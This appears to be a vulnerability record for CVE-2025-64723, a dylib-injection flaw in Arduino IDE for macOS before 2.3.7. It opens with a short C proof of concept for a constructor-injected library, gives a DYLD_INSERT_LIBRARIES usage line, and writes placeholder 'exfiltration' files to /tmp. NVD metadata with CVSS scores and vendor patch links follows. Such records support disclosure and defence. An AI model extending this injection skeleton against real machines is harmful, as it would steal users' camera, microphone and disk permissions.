CVE-2025-64723

// CVE-2025-64723 PoC - Malicious Dylib Injection // Compile: gcc -dynamiclib -o malicious.dylib malicious.c // Usage: DYLD_INSERT_LIBRARIES=malicious.dylib /Applications/Arduino.app/Contents/MacOS/Arduino #include <stdio.h> #include <stdlib.h> // Constructor that runs when library is loaded __attribute__((constructor)) void inject_payload() { printf("[+] Malicious dylib loaded into Arduino IDE\n"); // TCC permissions inherited from Arduino IDE: // - Full Disk Access // - Camera/Microphone (if granted) // - Screen Recording (if granted) // - Accessibility permissions // Example: Read sensitive files accessible to Arduino IDE FILE *fp = fopen("/tmp/tcc_exfil.txt", "w"); if (fp) { fprintf(fp, "TCC permissions accessed via injected library\n"); fprintf(fp, "Arduino IDE runs with elevated TCC access\n"); fclose(fp); } // Execute malicious operations with Arduino IDE's privileges system("echo 'Exfiltrating TCC permissions...' > /tmp/exfil.log"); } // Note: This PoC demonstrates the vulnerability principle. // Actual exploitation requires: // 1. Target system running Arduino IDE < 2.3.7 on macOS // 2. Attacker has local access with low privileges (PR:L) // 3. Target user's TCC permissions are granted to Arduino IDE

{"cve": {"id": "CVE-2025-64723", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:55.470", "lastModified": "2026-02-19T21:22:21.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS was configured with overly permissive security entitlements that could bypass macOS Hardened Runtime protections. This configuration allows attackers to inject malicious dynamic libraries into the application process, gaining access to all TCC (Transparency, Consent, and Control) permissions granted to the application. The fix is included starting from the `2.3.7 ` release."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arduino:arduino_ide:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.7", "matchCriteriaId": "9B0539DC-9343-439C-94B5-55D9034C3095"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://github.com/arduino/arduino-ide/commit/1fa0fd31c8d6b62f19332e33713a8c5b0f4ed6f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/arduino/arduino-ide/pull/2805", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/arduino/arduino-ide/releases/tag/2.3.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/arduino/arduino-ide/security/advisories/GHSA-vf5j-xhwq-8vqj", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}